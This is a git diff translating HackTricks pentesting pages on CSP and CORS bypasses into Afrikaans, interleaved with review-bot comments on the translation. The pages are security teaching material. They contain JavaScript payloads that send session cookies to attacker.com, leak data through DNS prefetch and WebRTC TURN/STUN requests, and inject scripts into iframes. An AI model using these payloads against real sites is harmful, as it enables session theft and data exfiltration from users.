@@ -589,183 +638,161 @@ You can **restrict a CSP of an Iframe** with the **`csp`** attribute: ``` {% endcode %} -In [**this CTF writeup**](https://github.com/aszx87410/ctf-writeups/issues/48), it was possible via **HTML injection** to **restrict** more a **CSP** so a script preventing CSTI was disabled and therefore the **vulnerability became exploitable.**\ -CSP can be made more restrictive using **HTML meta tags** and inline scripts can disabled **removing** the **entry** allowing their **nonce** and **enable specific inline script via sha**: - +In [**hierdie CTF writeup**](https://github.com/aszx87410/ctf-writeups/issues/48), was dit moontlik deur **HTML-injectie** om 'n **CSP** meer te **beperk**, sodat 'n skrip wat CSTI voorkom, gedeaktiveer is en dus die **kwesbaarheid uitbuitbaar geword het.**\ +CSP kan meer beperkend gemaak word deur gebruik te maak van **HTML meta-etikette** en inline-skripte kan gedeaktiveer word deur die **inskrywing** wat hul **nonce** toelaat te **verwyder** en **spesifieke inline-skrip te aktiveer via sha**: ```html ``` +### JS uitlekking met Content-Security-Policy-Report-Only -### JS exfiltration with Content-Security-Policy-Report-Only +As jy kan slaag om die bediener te laat reageer met die kop **`Content-Security-Policy-Report-Only`** met 'n **waarde wat deur jou beheer word** (dalk as gevolg van 'n CRLF), kan jy dit laat wys na jou bediener en as jy die **JS-inhoud** wat jy wil uitlek, **omsluit** met **`` note that this **script** will be **loaded** because it's **allowed by 'self'**. 
Moreover, and because WordPress is installed, an attacker might abuse the **SOME attack** through the **vulnerable** **callback** endpoint that **bypasses the CSP** to give more privileges to a user, install a new plugin...\ -For more information about how to perform this attack check [https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/](https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/) +'n Aanvaller kan daardie eindpunt misbruik om 'n SOME-aanval teen WordPress te **genereer** en dit binne `` in te sluit. Let daarop dat hierdie **script** sal **laai** omdat dit **toegelaat word deur 'self'**. Verder, en omdat WordPress geïnstalleer is, kan 'n aanvaller die **SOME-aanval** misbruik deur die **kwesbare** **terugroep-eindpunt** wat die CSP **omseil** om meer voorregte aan 'n gebruiker te gee, 'n nuwe invoegtoepassing te installeer... +Vir meer inligting oor hoe om hierdie aanval uit te voer, kyk [https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/](https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/) -## CSP Exfiltration Bypasses +## CSP Uitlekvermyding -If there is a strict CSP that doesn't allow you to **interact with external servers**, there are some things you can always do to exfiltrate the information. +As daar 'n streng CSP is wat jou nie toelaat om **met eksterne bedieners te kommunikeer nie**, is daar sekere dinge wat jy altyd kan doen om die inligting uit te lek. -### Location - -You could just update the location to send to the attacker's server the secret information: +### Ligging +Jy kan eenvoudig die ligging opdateer om die geheime inligting na die aanvaller se bediener te stuur: ```javascript -var sessionid = document.cookie.split('=')[1]+"."; +var sessionid = document.cookie.split('=')[1]+"."; document.location = "https://attacker.com/?" 
+ sessionid; ``` +### Meta-etiket -### Meta tag - -You could redirect by injecting a meta tag (this is just a redirect, this won't leak content) - +Jy kan omskakel deur 'n meta-etiket in te spuit (dit is net 'n omskakeling, dit sal nie inhoud lek nie) ```html ``` +### DNS Voorafoplossing -### DNS Prefetch - -To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.\ -You can indicate a browser to pre-resolve a hostname with: `` - -You could abuse this behaviour to **exfiltrate sensitive information via DNS requests**: +Om bladsye vinniger te laai, sal webblaaier die hostnaam vooraf oplos na IP-adresse en dit vir later gebruik in die kas geplaas word.\ +Jy kan 'n webblaaier aandui om 'n hostnaam vooraf op te los met: `` +Jy kan hierdie gedrag misbruik om **gevoelige inligting te eksfiltreer deur middel van DNS-versoeke**: ```javascript -var sessionid = document.cookie.split('=')[1]+"."; +var sessionid = document.cookie.split('=')[1]+"."; var body = document.getElementsByTagName('body')[0]; body.innerHTML = body.innerHTML + ""; ``` - -Another way: - +'n Ander manier: ```javascript const linkEl = document.createElement('link'); linkEl.rel = 'prefetch'; linkEl.href = urlWithYourPreciousData; document.head.appendChild(linkEl); ``` - -In order to avoid this from happening the server can send the HTTP header: - +Om te voorkom dat dit gebeur, kan die bediener die HTTP-kop stuur: ``` X-DNS-Prefetch-Control: off ``` - {% hint style="info" %} -Apparently, this technique doesn't work in headless browsers (bots) +Dit blyk dat hierdie tegniek nie werk in headless webblaaier (bots) nie. {% endhint %} ### WebRTC -On several pages you can read that **WebRTC doesn't check the `connect-src` policy** of the CSP. - -Actually you can _leak_ informations using a _DNS request_. Check out this code: +Op verskeie bladsye kan jy lees dat **WebRTC nie die `connect-src` beleid van die CSP nagaan nie**. 
+Eintlik kan jy inligting _lek_ deur 'n _DNS-versoek_ te gebruik. Kyk na hierdie kode: ```javascript (async()=>{p=new RTCPeerConnection({iceServers:[{urls: "stun:LEAK.dnsbin"}]});p.createDataChannel('');p.setLocalDescription(await p.createOffer())})() ``` - -Another option: - +'n Ander opsie:' ```javascript var pc = new RTCPeerConnection({ - "iceServers":[ - {"urls":[ - "turn:74.125.140.127:19305?transport=udp" - ],"username":"_all_your_data_belongs_to_us", - "credential":"." - }] +"iceServers":[ +{"urls":[ +"turn:74.125.140.127:19305?transport=udp" +],"username":"_all_your_data_belongs_to_us", +"credential":"." +}] }); pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp); ``` - -## Checking CSP Policies Online +## Kontroleer CSP-beleide aanlyn * [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com) * [https://cspvalidator.org/](https://cspvalidator.org/#url=https://cspvalidator.org/) -## Automatically creating CSP +## Outomaties skep van CSP [https://csper.io/docs/generating-content-security-policy](https://csper.io/docs/generating-content-security-policy) -## References +## Verwysings * [https://hackdefense.com/publications/csp-the-how-and-why-of-a-content-security-policy/](https://hackdefense.com/publications/csp-the-how-and-why-of-a-content-security-policy/) * [https://lcamtuf.coredump.cx/postxss/](https://lcamtuf.coredump.cx/postxss/) @@ -780,29 +807,29 @@ pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutvinders van beloningsjagte! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hackering ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Hack-nuus in werklikheid**\ +Bly op hoogte van die vinnige hackering-wêreld deur middel van werklikheidsnuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste aankondigings**\ +Bly ingelig met die nuutste beloningsjagte wat begin en noodsaaklike platformopdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hackering van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hackeringstruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
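Review bot: in the `@@ -589,183 +638,161 @@` hunk of content-security-policy-csp-bypass/README.md the translation rewrites the contents of a fenced code block: the `RTCPeerConnection` example loses all of its leading whitespace (`"iceServers":[`, `{"urls":[` and `"turn:74.125.140.127:19305?transport=udp"` are now flush-left), and the blank lines that separated prose from the ``` fences and from the `{% hint %}` block are dropped. The translation workflow should pass fenced code through verbatim; here the damage is cosmetic because it is JavaScript, but the same pass would change behaviour in an indentation-sensitive snippet. Wording slips in this file worth fixing before merge: `+'n Ander opsie:'` carries a stray trailing apostrophe; "toegelate ifram" in the preceding hunk should be "iframe"; "HTML-injectie" should match the "inspuit" used for the same concept a few lines earlier; and "omskakel" (convert) in the meta-tag section should be "herlei" (redirect). In the sponsorship block, "**Hack-nuus in werklikheid**" renders "Real-Time Hack News" as "hack news in reality" (the term is "intydse"), and "hackering"/"hackeringstruuks" here versus "hacking-truuks", "haktruuks" and "hacktruuks" in the other files of this patch should be unified, ideally by translating the shared footer once. Unrelated to the translation but visible in the unchanged context, `pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);` is missing the closing parenthesis of `.then(` and does not parse as written.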
diff --git a/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md b/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md index 66946eba2..3fa52575c 100644 --- a/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md +++ b/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md @@ -1,34 +1,29 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-A configuration such as: - +'n Konfigurasie soos: ``` Content-Security-Policy: default-src 'self' 'unsafe-inline'; ``` +Probeer om enige funksies wat kode uitvoer as 'n string verbied. Byvoorbeeld: `eval, setTimeout, setInterval` sal almal geblokkeer word as gevolg van die instelling `unsafe-eval`. -Prohibits usage of any functions that execute code transmitted as a string. For example: `eval, setTimeout, setInterval` will all be blocked because of the setting `unsafe-eval` +Enige inhoud van eksterne bronne word ook geblokkeer, insluitend beelde, CSS, WebSockets, en veral JS. -Any content from external sources is also blocked, including images, CSS, WebSockets, and, especially, JS - -### Via Text & Images - -It's observed that modern browsers convert images and texts into HTML to enhance their display (e.g., setting backgrounds, centering, etc.). Consequently, if an image or text file, such as `favicon.ico` or `robots.txt`, is opened via an `iframe`, it's rendered as HTML. Notably, these pages often lack CSP headers and may not include X-Frame-Options, enabling the execution of arbitrary JavaScript from them: +### Via Tekste & Beelde +Dit is waargeneem dat moderne webblaaier beelde en tekste omskakel na HTML om hul vertoning te verbeter (bv. agtergronde instel, sentrering, ens.). Gevolglik, as 'n beeld of tekslêer, soos `favicon.ico` of `robots.txt`, geopen word deur middel van 'n `iframe`, word dit as HTML weergegee. Dit is belangrik om op te let dat hierdie bladsye dikwels nie CSP-koppe bevat nie en moontlik nie X-Frame-Options insluit nie, wat die uitvoering van willekeurige JavaScript vanaf hulle moontlik maak: ```javascript frame=document.createElement("iframe"); frame.src="/css/bootstrap.min.css"; 
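Review bot: in the `@@ -1,34 +1,29 @@` hunk of csp-bypass-self-+-unsafe-inline-with-iframes.md the line `+Probeer om enige funksies wat kode uitvoer as 'n string verbied.` changes the meaning of the source and is ungrammatical: the English says the policy *prohibits* functions that execute code passed as a string, not that the reader should *try to* prohibit them; something like "Verbied die gebruik van enige funksie wat kode uitvoer wat as 'n string deurgegee word" keeps the sense. While touching that sentence it is worth correcting an error the translation carries over from the source: `eval`, `setTimeout` and `setInterval` with string arguments are blocked because `'unsafe-eval'` is absent from the `default-src 'self' 'unsafe-inline'` policy shown, not "as gevolg van die instelling `unsafe-eval`". Minor: "moderne webblaaier beelde en tekste omskakel" needs the plural "webblaaiers".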
@@ -37,11 +32,9 @@ script=document.createElement('script'); script.src='//example.com/csp.js'; window.frames[0].document.head.appendChild(script); ``` +### Via Foute -### Via Errors - -Similarly, error responses, like text files or images, typically come without CSP headers and might omit X-Frame-Options. Errors can be induced to load within an iframe, allowing for the following actions: - +Op dieselfde manier, foutboodskappe soos tekslêers of beelde, kom gewoonlik sonder CSP-koppe en kan X-Frame-Options weglaat. Foute kan geïnduseer word om binne 'n iframe te laai, wat die volgende aksies moontlik maak: ```javascript // Inducing an nginx error frame=document.createElement("iframe"); @@ -61,33 +54,27 @@ document.body.appendChild(frame); // Removal of cookies is crucial post-execution for(var i=0;i<5;i++){document.cookie=i+"="} ``` - -After triggering any of the mentioned scenarios, JavaScript execution within the iframe is achievable as follows: - +Na die aktivering van enige van die genoemde scenario's, is JavaScript-uitvoering binne die iframe moontlik as volg: ```javascript script=document.createElement('script'); script.src='//example.com/csp.js'; window.frames[0].document.head.appendChild(script); ``` - - -## References +## Verwysings * [https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
- - diff --git a/pentesting-web/cors-bypass.md b/pentesting-web/cors-bypass.md index 9e60df9d6..ac1e224aa 100644 --- a/pentesting-web/cors-bypass.md +++ b/pentesting-web/cors-bypass.md @@ -2,64 +2,63 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## What is CORS? +## Wat is CORS? -Cross-Origin Resource Sharing (CORS) standard **enables servers to define who can access their assets** and **which HTTP request methods are permitted** from external sources. +Cross-Origin Resource Sharing (CORS) standaard **stel bedieners in staat om te bepaal wie toegang tot hul bates kan verkry** en **watter HTTP-aanvraagmetodes toegelaat word** vanaf eksterne bronne. -A **same-origin** policy mandates that a **server requesting** a resource and the server hosting the **resource** share the same protocol (e.g., `http://`), domain name (e.g., `internal-web.com`), and **port** (e.g., 80). Under this policy, only web pages from the same domain and port are allowed access to the resources. +'n **Selfde-oorsprong**-beleid vereis dat 'n **bediener wat 'n bron aanvra** en die bediener wat die **bron herberg** dieselfde protokol (bv. `http://`), domeinnaam (bv. `internal-web.com`), en **poort** (bv. 80) deel. Onder hierdie beleid word slegs webbladsye van dieselfde domein en poort toegelaat om toegang tot die bronne te verkry. -The application of the same-origin policy in the context of `http://normal-website.com/example/example.html` is illustrated as follows: +Die toepassing van die selfde-oorsprong-beleid in die konteks van `http://normal-website.com/example/example.html` word as volg geïllustreer: -| URL accessed | Access permitted? | +| Geaktiveerde URL | Toegang toegelaat? 
| | ----------------------------------------- | ---------------------------------- | -| `http://normal-website.com/example/` | Yes: Identical scheme, domain, and port | -| `http://normal-website.com/example2/` | Yes: Identical scheme, domain, and port | -| `https://normal-website.com/example/` | No: Different scheme and port | -| `http://en.normal-website.com/example/` | No: Different domain | -| `http://www.normal-website.com/example/` | No: Different domain | -| `http://normal-website.com:8080/example/` | No: Different port* | +| `http://normal-website.com/example/` | Ja: Identiese skema, domein en poort | +| `http://normal-website.com/example2/` | Ja: Identiese skema, domein en poort | +| `https://normal-website.com/example/` | Nee: Verskillende skema en poort | +| `http://en.normal-website.com/example/` | Nee: Verskillende domein | +| `http://www.normal-website.com/example/` | Nee: Verskillende domein | +| `http://normal-website.com:8080/example/` | Nee: Verskillende poort* | -*Internet Explorer disregards the port number in enforcing the same-origin policy, thus allowing this access. +*Internet Explorer ignoreer die poortnommer in die afdwinging van die selfde-oorsprong-beleid, wat toegang toelaat. -### `Access-Control-Allow-Origin` Header +### `Access-Control-Allow-Origin`-kop -This header can allow **multiple origins**, a **`null`** value, or a wildcard **`*`**. However, **no browser supports multiple origins**, and the use of the wildcard `*` is subject to **limitations**. (The wildcard must be used alone, and its use alongside `Access-Control-Allow-Credentials: true` is not permitted.) +Hierdie kop kan **verskeie oorspronge**, 'n **`null`**-waarde, of 'n wildkaart **`*`** toelaat. Tog ondersteun **geen webblaaier verskeie oorspronge nie**, en die gebruik van die wildkaart `*` is onderhewig aan **beperkings**. (Die wildkaart moet alleen gebruik word, en dit mag nie saam met `Access-Control-Allow-Credentials: true` gebruik word nie.) 
-This header is **issued by a server** in response to a cross-domain resource request initiated by a website, with the browser automatically adding an `Origin` header. +Hierdie kop word **deur 'n bediener** uitgereik as antwoord op 'n kruis-domein-bronaanvraag wat deur 'n webwerf geïnisieer word, met die blaaier wat outomaties 'n `Origin`-kop byvoeg. -### `Access-Control-Allow-Credentials` Header +### `Access-Control-Allow-Credentials`-kop -By **default**, cross-origin requests are made without credentials like cookies or the Authorization header. Yet, a cross-domain server can allow the reading of the response when credentials are sent by setting the `Access-Control-Allow-Credentials` header to **`true`**. - -If set to `true`, the browser will transmit credentials (cookies, authorization headers, or TLS client certificates). +Standaard word kruis-domein-aanvrae sonder geloofsbriewe soos koekies of die Authorization-kop gemaak. Tog kan 'n kruis-domein-bediener die lees van die respons toelaat wanneer geloofsbriewe gestuur word deur die `Access-Control-Allow-Credentials`-kop na **`true`** in te stel. +Indien gestel op `true`, sal die blaaier geloofsbriewe (koekies, outorisasiekoppe of TLS-kliëntsertifikate) oordra. ```javascript var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { - if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) { - console.log(xhr.responseText); - } +if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) { +console.log(xhr.responseText); } -xhr.open('GET', 'http://example.com/', true); -xhr.withCredentials = true; +} +xhr.open('GET', 'http://example.com/', true); +xhr.withCredentials = true; xhr.send(null); ``` ```javascript fetch(url, { - credentials: 'include' +credentials: 'include' }) ``` 
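Review bot: in the `@@ -2,64 +2,63 @@` hunk of cors-bypass.md both JavaScript examples inside code fences are modified instead of being passed through: the `XMLHttpRequest` block loses its indentation and the diff re-aligns the closing braces (`-    }` / ` }` / `+}`) so that the unchanged statements `xhr.open('GET', 'http://example.com/', true);` and `xhr.withCredentials = true;` show up as removed and re-added, and in the `fetch` block `credentials: 'include'` is flush-left. The braces still balance, but the workflow should leave fenced code untouched. The same hunk drops the blank line between "Standaard word kruis-domein-aanvrae ..." and "Indien gestel op `true`, ...", merging two paragraphs into one, and `| Geaktiveerde URL |` renders "URL accessed" as "activated URL" ("Besoekte URL" fits the table's meaning).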
@@ -71,19 +70,17 @@ xhr.setRequestHeader('Content-Type', 'application/xml'); xhr.onreadystatechange = handler; xhr.send('Arun'); ``` +### CSRF Voorafgaande versoek -### CSRF Pre-flight request +### Begrip van Voorafgaande Versoeke in Kruis-Domein Kommunikasie -### Understanding Pre-flight Requests in Cross-Domain Communication +Wanneer 'n kruis-domein versoek onder spesifieke omstandighede geïnisieer word, soos die gebruik van 'n **nie-standaard HTTP-metode** (enige iets anders as HEAD, GET, POST), die invoer van nuwe **koppe** of die gebruik van 'n spesiale **Content-Type kopwaarde**, kan 'n voorafgaande versoek vereis word. Hierdie voorlopige versoek, wat die **`OPTIONS`** metode gebruik, dien om die bedoelings van die komende kruis-oorsprong versoek aan die bediener te kommunikeer, insluitend die HTTP-metodes en koppe wat dit van plan is om te gebruik. -When initiating a cross-domain request under specific conditions, such as using a **non-standard HTTP method** (anything other than HEAD, GET, POST), introducing new **headers**, or employing a special **Content-Type header value**, a pre-flight request may be required. This preliminary request, leveraging the **`OPTIONS`** method, serves to inform the server of the forthcoming cross-origin request's intentions, including the HTTP methods and headers it intends to use. +Die **Cross-Origin Resource Sharing (CORS)**-protokol vereis hierdie voorafgaande kontrole om die uitvoerbaarheid van die versoekte kruis-oorsprong operasie te bepaal deur die toegelate metodes, koppe en die betroubaarheid van die oorsprong te verifieer. Vir 'n gedetailleerde begrip van watter omstandighede die behoefte aan 'n voorafgaande versoek omseil, raadpleeg die omvattende gids wat deur [**Mozilla Developer Network (MDN)**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests) verskaf word. 
-The **Cross-Origin Resource Sharing (CORS)** protocol mandates this pre-flight check to determine the feasibility of the requested cross-origin operation by verifying the allowed methods, headers, and the trustworthiness of the origin. For a detailed understanding of what conditions circumvent the need for a pre-flight request, refer to the comprehensive guide provided by [**Mozilla Developer Network (MDN)**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests). - -It's crucial to note that the **absence of a pre-flight request does not negate the requirement for the response to carry authorization headers**. Without these headers, the browser is incapacitated in its ability to process the response from the cross-origin request. - -Consider the following illustration of a pre-flight request aimed at employing the `PUT` method along with a custom header named `Special-Request-Header`: +Dit is belangrik om daarop te let dat die **afwesigheid van 'n voorafgaande versoek nie die vereiste vir die respons om outorisasie-koppe te dra, ontkrag nie**. Sonder hierdie koppe is die webblaaier nie in staat om die respons van die kruis-oorsprong versoek te verwerk nie. +Oorweeg die volgende illustrasie van 'n voorafgaande versoek wat daarop gemik is om die `PUT`-metode saam met 'n aangepaste kop genaamd `Special-Request-Header` te gebruik: ``` OPTIONS /info HTTP/1.1 Host: example2.com @@ -92,9 +89,7 @@ Origin: https://example.com Access-Control-Request-Method: POST Access-Control-Request-Headers: Authorization ``` - -In response, the server might return headers indicating the accepted methods, the allowed origin, and other CORS policy details, as shown below: - +In reaksie kan die bediener koppele terugstuur wat die aanvaarde metodes, die toegelate oorsprong en ander CORS-beleidsbesonderhede aandui, soos hieronder getoon: ```markdown HTTP/1.1 204 No Content ... 
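Review bot: in the `@@ -92,9 +89,7 @@` hunk of cors-bypass.md, `+In reaksie kan die bediener koppele terugstuur` introduces the non-word "koppele"; the rest of the file uses "koppe" for headers, so this should read "koppe terugstuur".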
@@ -104,26 +99,23 @@ Access-Control-Allow-Headers: Authorization Access-Control-Allow-Credentials: true Access-Control-Max-Age: 240 ``` +- **`Access-Control-Allow-Headers`**: Hierdie kop spesifiseer watter koppe gebruik kan word tydens die werklike versoek. Dit word deur die bediener ingestel om die toegelate koppe in versoek van die kliënt aan te dui. +- **`Access-Control-Expose-Headers`**: Deur hierdie kop gee die bediener aan die kliënt inligting oor watter koppe as deel van die respons blootgestel kan word, behalwe die eenvoudige responskoppe. +- **`Access-Control-Max-Age`**: Hierdie kop dui aan hoe lank die resultate van 'n voorafgaande versoek in die kas gestoor kan word. Die bediener stel die maksimum tyd, in sekondes, vas wat die inligting wat deur 'n voorafgaande versoek teruggekeer word, hergebruik kan word. +- **`Access-Control-Request-Headers`**: Hierdie kop word in voorafgaande versoek gestel en deur die kliënt gebruik om die bediener in te lig oor watter HTTP-koppe die kliënt in die werklike versoek wil gebruik. +- **`Access-Control-Request-Method`**: Hierdie kop, ook in voorafgaande versoek gebruik, word deur die kliënt gestel om aan te dui watter HTTP-metode in die werklike versoek gebruik sal word. +- **`Origin`**: Hierdie kop word outomaties deur die webblaaier ingestel en dui die oorsprong van die kruis-oorsprong versoek aan. Dit word deur die bediener gebruik om te bepaal of die inkomende versoek toegelaat of geweier moet word op grond van die CORS-beleid. -- **`Access-Control-Allow-Headers`**: This header specifies which headers can be used during the actual request. It is set by the server to indicate the allowed headers in requests from the client. -- **`Access-Control-Expose-Headers`**: Through this header, the server informs the client about which headers can be exposed as part of the response besides the simple response headers. 
